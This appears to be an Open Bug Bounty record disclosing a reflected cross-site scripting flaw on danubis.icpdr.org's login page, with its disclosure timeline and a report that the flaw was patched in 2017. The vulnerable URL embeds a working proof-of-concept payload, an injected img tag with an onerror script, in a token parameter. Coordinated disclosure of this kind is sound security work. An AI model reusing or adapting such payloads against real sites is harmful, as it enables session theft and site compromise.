danubis.icpdr.org XSS vulnerability

2016-02-19T17:11:00
ID OBB:136455
Type openbugbounty
Reporter m3tal
Modified 2017-07-26T17:22:00

Description

Vulnerable URL:
http://danubis.icpdr.org/pls/danubis_sso/danubis_sso.danubis_login?site2pstoretoken=v1.1~1354~A29K%22%3E%3Cimg%20src=x%20onerror=alert%28/XSSPOSED/%29%3E/9E4673FF1F6EC12DACF72F77C0E51C1A59A851E02545D26FF12D253CED42141E4906A2FB56BD61DE51F799D435BD7493568A41A1E2D72F50BEA7D9F9BC09D7F322950E70E4360B85CDFF5407E2BA3709E7DF1867F0A0D2B353E2CD7A9EB569378A03D200D0993C2E496B04BE481B4F249351BD872A241EE1F5EF42C86701B51115B52C4276259A27D6EB5561C7F3C4F576F8F8D2833DA145E9C7FE4018E9423A76C8A6B41723B6F989D9C5C1088B7F17040F315BCD7051613F5323901550A715AB0D2E5C840FB66AF53D80A82A98D73A9EF058ABA27181E265F56D7E1C5CDFD6E3E69E904CA41&p_error_code=&subscribername=&ssousername=&p_cancel_url=http://danubis.icpdr.org/pls/danubis/DANUBIS_DB.DYN_NAVIGATOR.show&p_submit_url=http://danubis.icpdr.org/pls/danubis_sso/DANUBIS_SSO.wwsso_app_admin.ls_login

Details:

Description| Value
---|---
Patched:| Yes, on 26.07.2017
Latest check for patch:| 26.07.2017 17:22 GMT
Vulnerability type:| XSS
Vulnerability status:| Publicly disclosed
Alexa Rank| Unknown / Not calculated
Google Pagerank| 5
VIP website status:| No
Check danubis.icpdr.org SSL connection:| (Grade: F)

Coordinated Disclosure Timeline:

Description| Value
---|---
Vulnerability submitted via Open Bug Bounty| 19 February, 2016 17:11 GMT
Generic security notifications sent to website owner| 19 February, 2016 17:14 GMT
Notification sent to subscribers (without technical details)| 19 February, 2016 18:17 GMT
Vulnerability details disclosed by researcher| 26 February, 2016 18:11 GMT
Vulnerability patched by the website owner| 26 July, 2017 17:22 GMT